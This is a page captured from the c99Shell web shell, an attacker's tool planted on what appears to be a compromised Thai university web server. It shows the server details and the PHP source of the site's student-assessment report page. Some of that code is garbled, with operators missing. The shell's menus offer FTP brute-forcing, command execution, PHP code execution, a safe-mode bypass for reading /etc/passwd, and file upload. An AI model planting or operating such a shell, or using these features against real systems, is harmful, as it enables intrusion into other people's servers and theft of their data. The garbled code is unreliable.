!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     reportDataRQHStdp2.php (21.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once "../../class/clsDB.php";
include_once 
"../../class/clsConnection.php";
include_once 
"../global.php";
include_once 
"../class/clsReg_Program.php";
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../link/function.php";
include_once 
"../class/clsStudentAssess.php";
include_once 
"../class/clsHoldStudent.php";
include_once 
"../class/clsHoldProgram.php";
include_once 
"../class/clsDefineAssessment.php";
include_once 
"../class/clsAssessForm.php";
include_once 
"../class/clsDoAssessmentHStd.php";
include_once 
"../class/clsResultRQHStd.php";
include_once 
"../class/clsSectionAll.php";
include_once 
"../class/clsSectionRQ.php";
include_once 
"../class/clsHeaderQuestion.php";
include_once 
"../class/clsHeaderScore.php";
include_once 
"../class/clsDetailScore.php";
include_once 
"../class/clsRadioQuestion.php";
include_once 
"../class/clsSectionAll.php";

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oProg = new Program($oCR);

$oSse = new SysSemesterDes($oCR);
$oSse->SearchByKey($semester);
$oSse->GetRecord();

$oDA = new DefineAssessment($oCA);
$oDA->SearchByDefineid($defineid);
$oDA->GetRecord();
        
$numStdDoAss 0;
$oDoHStd = new DoAssessmentHStd($oCA);
//$oDoHStd->SearchByDefineid($defineid);
//while($oDoHStd->GetRecord()){
//    $numStdDoAss++;
//}
$numStdDoAss $oDoHStd->CountDoidByDefineid($defineid,$stdY);
$oAF = new AssessForm($oCA);
$oAF->RSAssessFormByAssid($assid);
$oAF->GetRecord();

$oHStd = new HoldStudent($oCA);
$oHPg = new HoldProgram($oCA);
$oHP1 = new HoldProgram($oCA);
$oHP2 = new HoldProgram($oCA);

//ค้นหาคำถามปลายเปิดในแบบประเมินนี้ sectionTQid = 1
$oSA = new SectionAll($oCA);

$CntSRQid $oSA->RSCountSectionRQid($assid);

$oRRQ = new ResultRQHStd($oCA);
?>
<title>รายงานผลประเมินจำแนกตามหัวข้อการประเมิน (เฉพาะคำถามปลายปิด)</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
       <form name="pc" method="post" action="<?php echo $PHP_SELF;?>" enctype="multipart/form-data">
          <br>
          <table width="94%" align="center" cellpadding="1" cellspacing="1"  bgcolor="#0080C0">
            <tr bgcolor="#FFFFFF">
              <td>
              <table width="93%" align="center" border="0" cellpadding="0" cellspacing="1">
                  <tr> 
                    <td> <table width="100%" border="0" align="center">
                        <tr>
                          <td height="10"></td>
                        </tr>
                      </table>
                      <table width="100%" align="center"  cellpadding="1" cellspacing="1" bgcolor="<?php if($oDA->flag == 2){ echo "#FFDFDF"; }else if($oDA->flag == 3){ echo "#DAE6FC"; } ?>">
                        <tr> 
                          
                  <td height="22" align="center"><font size="2"><span class = "fontMark5">รายงานผลการประเมินจำแนกตามหัวข้อการประเมิน</span></font></td>
                        </tr>
                        <tr> 
                          
                  <td height="22" align="center"><font size="2"><span class = "fontMark6">เฉพาะคำถามปลายปิด 
                    : ส่วนของคำถามชนิดให้เลือกตอบอย่างใดอย่างหนึ่ง</span></font></td>
                        </tr>
                      </table>
                      <table width="100%" border="0" align="center">
                        <tr>
                          <td><hr></td>
                        </tr>
                      </table>
                       <table width="100%" border="0" align="center">   
                  <tr> 
                    <td height="37" align="right"><font size="2"><span class = "fontMark5"><b> 
</b><img src="../picture/ico_excel.gif" border="0"><b><a href="reportDataRQHStdp2_excel.php?defineid=<? echo $defineid?>&assid=<? echo $assid?>&acadYear=<? echo  $acadYear?>&semester=<? echo $semester?>&stdY=<? echo  $stdY?>" target="_top"> รูปแบบ Excel</a></b></span></font></td>
                       </tr>
                      </table>
                      
              <table width="100%" border="0" align="center">
                <tr>
                  <td><font size="2"><b><img src="../picture/bullet.gif"> ชื่อทางการแบบประเมิน</b></font></td>
                  <td colspan="2"><font size="2"><b>: </b><? echo $oAF->nameAss ?></font></td>
                </tr>
                <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                  <td><font size="2"><b><img src="../picture/bullet.gif"> ชื่อทั่วไปแบบประเมิน</b></font></td>
                  <td colspan="2"><font size="2"><b>: </b>
                    <? if($oAF->maintopic == ""){ echo "-"; }else{ echo $oAF->maintopic; } ?>
                  </font></td>
                </tr>
                <tr> 
                  <td><font size="2"><b><img src="../picture/bullet.gif"> ปีการศึกษา</b></font></td>
                  <td colspan="2"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oSse->semesterName;?> 
                    / <?php echo $acadYear ?></font><font size="2">&nbsp;</font></td>
                </tr>
                <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                  <?    if($oDA->flag == 2){   ?>
                  <td width="173" height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                    ประเมินนักศึกษาชั้นปีที่</b></font></td>
                  <td colspan="2"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                    <b>: </b> 
                    <?php
                                $x
=1;
                                
$numStdAll =0;
                            if(
$stdY=='%'){
                                
$oHStd->SearchByDefineid($defineid);
                                while(
$oHStd->GetRecord()){ 
                                
/*    $oStd = new StudentAssess($oCA);
                                    $numStdAll += $oStd->CountStdByAcYSePgIdStdY($acadYear, $semester, '%', $oHStd->stdYearAss);
                                
                                    $oStd = new StudentAssess($oCA);
                                    $Tm1 = $oStd->CountStdBystdYearAss($oHStd->stdYearAss);
                                    $numStdAll = $Tm2+$Tm1;
                                    $Tm2 = $numStdAll;
                                
                                    $oStd = new StudentAssess($oCA);
                                    $Tm1 = $oStd->CountHstdRegis($oDA->acadYear, $oDA->semester, $oHStd->stdYearAss); //edit 08/2553
                                    $numStdAll = $Tm2+$Tm1;
                                    $Tm2 = $numStdAll;
                                */    
$stdYearAssTmp[$x] = $oHStd->stdYearAss;
                                    
$x++;
                                }
                            }else{
                                
$stdYearAssTmp[$x] = $stdY;
                            }
                                
$round 0;
                                for(
$i=1;$i<=4;$i++){
                                    if(
$stdYearAssTmp[$i] != ""){
                                        
$round ++;
                                    }
                                }        
            
                                for(
$i=1;$i<=4;$i++){        
                                    echo 
$stdYearAssTmp[$i];
                                    if(
$i<=$round-1){
                                        echo 
",";
                                    }
                                }
                                
$oStd = new StudentAssess($oCA);
                                
$numStdAll $oStd->CountHstdRegis($oDA->acadYear$oDA->semester$stdY);
                            
?>
                    </font></td>
                  <? }else if($oDA->flag == 3){  ?>
                  <td width="173" height="22" valign="baseline"><font size="2"><b><img src="../picture/bullet.gif"> 
                    ประเภทหลักสูตรที่ประเมิน</b></font></td>
                  <td colspan="2"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                    <b>: </b> 
                    <?php
                                
//หาจำนวนนักศึกษาที่มีสิทธิ์ประเมิน-หลักสุตร-ชั้นปี
                                
$oHPg->SearchByDefineid($defineid);
                                
$numStdAll 0;
                                while(
$oHPg->GetRecord()){ 
                                    
$oStd = new StudentAssess($oCA);
                                    
$numStdAll += $oStd->CountStdByAcYSePgIdStdY($acadYear$semester$oHPg->programId$oHPg->stdYearAss);
                                
/*
                                    $oProg->SearchByKey($oHPg->programId);
                                    $oProg->GetRecord();
                                    //echo "<br> programId = ".$oHPg->programId."   stdYear = ".$oHPg->stdYearAss;
                                    $oStd = new StudentAssess($oCA);
                                    $Tm1 = $oStd->CountStdByProgramNameStdYearAss($oProg->programName,$oHPg->stdYearAss);
                                    //echo "   --> ".$Tm1;
                                    $numStdAll = $Tm2+$Tm1;
                                    $Tm2 = $numStdAll;
                                */
                                
}
                                
                                
//แสดงหลักสูตร-ชั้นปี ที่มีการกำหนดให้มีการประเมิน
                                
$x=1;
                                
$oHP1->SearchByDefineidGroupByProgramId($defineid);
                                while(
$oHP1->GetRecord()){ 
                                    
$oProg->SearchByKey($oHP1->programId);
                                    
$oProg->GetRecord();
                                    
$stdProgTmp[$x] = $oProg->programName;

                                    
$m=1;
                                    
$oHP2->SearchByProgramIdDefineid($oHP1->programId,$defineid);
                                    while(
$oHP2->GetRecord()){
                                        
$stdYearAssTmp[$x][$m] =  $oHP2->stdYearAss;
                                        
$m++;
                                    }
                                    
$indexStdYear[$x] = $m-1;    
                                    
$x++;
                                }  
// end while oHP1

                                
$round 0;                        
                                for(
$i=1;$i<=$x-1;$i++){                            
                                    if(
$stdProgTmp[$i] != ""){
                                        
$round ++;
                                    }
                                }        

                                for(
$i=1;$i<=$x-1;$i++){
                                    
$round_in 0;        
                                    echo 
$stdProgTmp[$i]." - ปี";
                                    for(
$j=1;$j<=$indexStdYear[$i];$j++){
                                        echo 
$stdYearAssTmp[$i][$j];
                                        if(
$stdYearAssTmp[$i][$j] != ""$round_in++;
                                        if(
$round_in $indexStdYear[$i]) echo ",";
                                    }
                                    if(
$i<=$round-1) echo "<br> &nbsp;";
                                }
                            
?>
                    </font></td>
                  <? ?>
                </tr>
                <tr> 
                  <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                    ช่วงเวลาในการประเมิน</b></font></td>
                  <td width="213"><font size="2"><b> :</b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                    <? echo abbreDate(splitDateDb2($oDA->startDate,'/')); ?> - 
                    <? echo abbreDate(splitDateDb2($oDA->endDate,'/'));  ?></font></td>
                  <td width="364"><font size="2"><b><img src="../picture/bullet.gif"> 
                    จำนวนนักศึกษาที่มีสิทธิ์ประเมินผล : </b></font><font size="2"><? echo $numStdAll ?></font></td>
                </tr>
                <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                  <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                    ร้อยละของนักศึกษาที่เข้าประเมิน : </b> 
                    <? $percentStdDo = ($numStdDoAss $numStdAll )*100;  printf ("%.2f",$percentStdDo);?>
                    </font></td>
                  <td><font size="2"><b><img src="../picture/bullet.gif"> จำนวนนักศึกษาที่เข้ามาประเมินผล 
                    : </b></font><font size="2"><? echo $numStdDoAss ?></font></td>
                </tr>
              </table>
              <br>
<? if($CntSRQid  0){
            
$oSA = new SectionAll($oCA);
            
$numSection$oSA->RSCountSectionAll($assid);
            
$oSA->RSByKeyAss($assid);
            
$i 1;
            
$indexSection 1;
            while (
$oSA->GetRecord()){
                
/*---------------- กรณีที่เลือกเป็นคำถามชนิดปลายปิด------------------*/
                
if($oSA->sectionRQid != '0'){
                    
//สร้าง oSRQ แสดงหัวข้อของส่วนการประเมิน
                    
$oSRQ = new SectionRQ($oCA);
                    
$oSRQ->RSSectionRQAll($assid,$oSA->sectionRQid);
                    while(
$oSRQ->GetRecord()){
                        
$oHQ = new HeaderQuestion($oCA);
                        
$oHQ->RSHeaderAllBySection($assid,$oSA->sectionRQid);
                        
$oHQ->GetRecord();                
                        
$oHS = new HeaderScore($oCA);
                        
$oHS->RSHeadSAll($oHQ->HSid);
                        
$oHS->GetRecord();
                
?>
                 <table width="100%">
                    <tr> 
                      <td height="26" colspan="2">&nbsp;</td>
                    </tr>
                    <tr> 
                      <td width="8%" valign="top"><font size="2"><span class = "fontMarkTD1"><? if($numSection == '1') { echo "คำอธิบาย"; } else { echo "ส่วนที่ ".$indexSection; }?></span> : </font></td>
                      <td width="92%"><font size="2"><? echo $oSRQ->topicSectionRQ ?></font></td>
                    </tr>
                </table>
                <table width="100%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#666666">
                  <tr> 
                    <td width="68%" rowspan="3" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"><font size="2"><b>หัวข้อการประเมิน</b></font></td>
                    <td width="16%" colspan="<? echo $oHS->score_amount*2 ?>" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"><font size="2"><b>  คะแนนการประเมิน </b></font></td>
                    <td width="6%" align="center" rowspan="3"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"><font size="2"><b>ค่าเฉลี่ย</b></font></td>
                    <td width="6%" align="center" rowspan="3"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"><font size="2"><b>S.D.</b></font></td>
                  </tr>
                  <tr> 
        <?        $oDS = new DetailScore($oCA);
                    
$oDS->RSDetailSAll($oHS->HSid);
                    while(
$oDS->GetRecord()){  
        
?>
                    <td height="23" colspan="2" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"><font size="2"><b>
                      <? echo $oDS->score ?> </b></font></td>
        <?        }
        
?>
                  </tr>
                  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_7"];?>"> 
                    <? for($i=0;$i<$oHS->score_amount;$i++){ ?>
                    <td height="22" align="center"><font size="2"><font size="2"><b>จำนวน</b></font></font></td>
                    <td width="4%" height="22" align="center"><font size="2">&nbsp;&nbsp;&nbsp;<b>%</b>&nbsp;&nbsp;&nbsp;</font></td>

                    <? ?>
                  </tr>
<?
                        $index1 
1$index2 1;
                        
$index_color1 1$index_color2 1;
                        
$CntSubQ 0;  $xbar 0$sd 0;

                        
$oRQ = new RadioQuestion($oCA);
                        
$oRQ->RSRadioQByKey($assid,$oSA->sectionRQid,1);
                        while(
$oRQ->GetRecord()){
                            
$oCntRQ = new RadioQuestion($oCA);
                            
$CntSubQ $oCntRQ->RSCountSubRQid($assid,$oRQ->RQid,'2');
    
                                if(
$index_color2%== 0){//EEF2FB
                                    
if($index_color1%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }
                                }else{
                                    if(
$index_color1%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }
                                }                                    
                      
?>
                      <td><font size="2"><? echo $index1."." ?> <? echo $oRQ->nameRQ ?></font>
                        <? if($oRQ->subtract == -1) { ?><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_7"]; ?>"> * </font> <? ?>
                      </td>
                         <?
                            
if($oRQ->subtract == -1){
                                
$oDS->RSDetailSAllDESC($oHS->HSid);
                            }else{
                                
$oDS->RSDetailSAll($oHS->HSid);
                            }
                                while(
$oDS->GetRecord()){  
                                
$countPointRQ $oRRQ->CountPointJoinByRQidDefineidPoint($oRQ->RQid,$defineid,$oDS->score,$stdY);
                                
//echo "<br> score_amount = ".$oDS->score;
                                //echo "<br> countPointRQ = ".$countPointRQ;
                                
$AvgCountPointRQ = ($countPointRQ/$numStdDoAss)*100;
                        
?>
                                 
                            <td align="center">
                              <? if(($CntSubQ == 0)&&($numStdDoAss '0')) echo $countPointRQ ?>
                              <? if(($CntSubQ == '0')&&($numStdDoAss == '0')) echo "-"?>
                            </td>
                                
                            <td align="center"><font size="2">
                              <? if(($CntSubQ == 0)&&($numStdDoAss '0')) printf ("%.2f",$AvgCountPointRQ); ?>
                              <? if(($CntSubQ == '0')&&($numStdDoAss == '0')) echo "-"?>
                              </font></td>
                        <?
                            
}    // end while oDS
        
                            
if($CntSubQ == 0){    
                                
//คิดค่าเฉลี่ยและค่า sd ของคำถามข้อหลัก 
                                
$oRRQ->SearchResultIXbarSDEachRQidByDefineidSectionRQid($defineid,$oSA->sectionRQid,$oRQ->RQid,$stdY);
                                if(
$oRRQ->GetRecord()){
                                    
$xbar $oRRQ->xbar;
                                    
$sd $oRRQ->sd;
                                }
                            } 
                        
?>
                                <td align="center"> 
                                 <? if($xbar != 0) echo substr($xbar,0,4); ?>
                                <? if(($CntSubQ == 0)&&($numStdDoAss == 0)) echo "-"?>
                                </td>
                                <td align="center"> 
                                <? if($xbar != 0)  echo number_format($sd,2); ?>
                                <? if(($CntSubQ == 0)&&($numStdDoAss == 0)) echo "-"?>
                                </td>
                              </tr>
                  <? /*--------------------------------------------------------- คำนวนส่วนของคำถามข้อย่อย-------------------------------------------------------*/
                                
$xbarSub 0$sdSub 0;
                                
$ocRQ = new RadioQuestion($oCA);
                                
$ocRQ->RSCheckLevel($assid,$oRQ->RQid);
                                while(
$ocRQ->GetRecord()){
                                    if(
$index_color1%== 0){//EEF2FB
                                        
if($index_color2%== 0){
                                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                        }else{
                                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                        }
                                    }else{
                                        if(
$index_color2%== 0){
                                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                        }else{
                                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                        }
                                    }                    

                        
?>
                             <td><? echo "<img src=\"../picture/blank1.gif\"border=\"0\">".$index1.".".$index2 ?>
                                    <? echo $ocRQ->nameRQ ?>
                                    <? if($ocRQ>subtract == -1) { ?><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_7"]; ?>"> * </font> <? ?>
                            </td>
                        <?
                            
if($ocRQ->subtract == -1){
                                
$oDS->RSDetailSAllDESC($oHS->HSid);
                            }else{
                                
$oDS->RSDetailSAll($oHS->HSid);
                            }
                            while(
$oDS->GetRecord()){  
                                
$countPointRQ $oRRQ->CountPointJoinByRQidDefineidPoint($ocRQ->RQid,$defineid,$oDS->score,$stdY);
                                
//echo "<br> score_amount = ".$oDS->score;
                                //echo "<br> countPointRQ = ".$countPointRQ;
                                
$AvgCountPointRQ = ($countPointRQ/$numStdDoAss)*100;
                        
?>
                                 
                        <td align="center"><? if($numStdDoAss '0') echo $countPointRQ ?>
                          <? if($numStdDoAss == '0') echo "-"?>
                        </td>
                                    
                        <td align="center"><font size="2"><? if($numStdDoAss '0'printf ("%.2f",$AvgCountPointRQ); ?> 
                          <? if($numStdDoAss == '0') echo "-"?>
                          </font></td>
                <? }    // end while oDS 

                        //คิดค่าเฉลี่ยและค่า sd ขอคำถามข้อย่อย
                            
$oRRQ->SearchResultIXbarSDEachRQidByDefineidSectionRQid($defineid,$oSA->sectionRQid,$ocRQ->RQid,$stdY);
                            if(
$oRRQ->GetRecord()){
                                
$xbarSub $oRRQ->xbar;
                                
$sdSub $oRRQ->sd;
                            }
                
?>          
                            <td align="center"> 
                                <? if($xbarSub != 0) echo substr($xbarSub,0,4); ?>
                                <? if($numStdDoAss == '0') echo "-"?>
                            </td>
                            <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($sdSub,2); ?>
                                <? if($numStdDoAss == '0') echo "-"?>
                          </td>
                      </tr>
                  <?      $index2++;
                              
$index_color2++;    
                              } 
//end while ocRQ    
                            
$index1++;
                            
$index2 1;
                            
$index_color1++;
?>
<?
                        
//end while oRQ
                            
if(($indexDoAss-1) == 0){ ?>
                          <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_5'];?>"> 
                            <td colspan="<? echo $mergeAll+1?>" align="center"> <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">** 
                              ไม่พบข้อมูล **</font> </td>
                          </tr>
                          <?    }  ?>
                    
        <?    //end while oSRQ

?>
                    <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>">
                        <td height="22" align="center"><font size="2"><b>รวม</b></font></td>
<?php
                        
for($col=0$col<$oDS->GetRowSelected(); $col++) {
?>
                        <td></td>
                        <td></td>
<?php
                        
}
                        
$oRRQ->SearchResultIXbarSDByDefineidSectionRQid($defineid,$oSA->sectionRQid,$stdY);
                        
$oRRQ->GetRecord();
?>
                        <td align="center"><font size="2"><b><?php echo substr($oRRQ->xbar04);?></b></font></td>
                        <td align="center"><font size="2"><b><?php echo number_format($oRRQ->sd2);?></b></font></td>
                    </tr></table><br>
<?

            
// end if oSA
            
$indexSection++;

        } 
//end while oSA 
        
            
$oRRQ->SearchResultIXbarSDByDefineidSectionRQid($defineid,'%',$stdY);
            
$oRRQ->GetRecord();

    
?>
                <table width="100%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="silver">
                     <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"> 
                      <td width=""  height="22" ><div align="right"><font size="2"><b>รวมทั้งหมด</b>&nbsp;</font></div></td>
                      <td width="5%" align="center"><b><? echo substr($oRRQ->xbar04?></b></td>
                      <td width="5%" align="center"><b><? echo number_format($oRRQ->sd,2); ?></b></td>

                    </tr>
                </table>
              <br>
                  <table width="100%" border="0" align="center">
                <tr> 
                  <td colspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_5"];?>"><b>หมายเหตุ 
                    :</b>&nbsp;&nbsp; * หมายถึงเป็นคำถามเชิงลบ โดยกรณีที่เป็นคำถามเชิงลบในข้อนั้นๆ 
                    ค่าเฉลี่ยและค่า S.D. จะคำนวณโดยกลับค่าให้แล้ว </font><font size="2">&nbsp;</font></td>
                </tr>
                <tr> 
                  <td width="70" height="24">&nbsp;</td>
                  <td width="674">&nbsp; </td>
                </tr>
              </table>
    <? } else { ?>
                    <table width="100%">
                          <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_5'];?>">     
                              <td align="center"> <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">** ไม่พบข้อมูลเนื่องจากแบบประเมินที่สร้างไม่มีส่วนของคำถามปลายปิด **</font> 
                            </td>
                          </tr>
                    </table>
    <? // end else if CntSRQid?>
                  </td>
                 </tr>
               </table><br>
                </td>
               </tr>
             </table>
          </form>
        
      </div>
</body>
<?php
//showFooter();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0086 ]--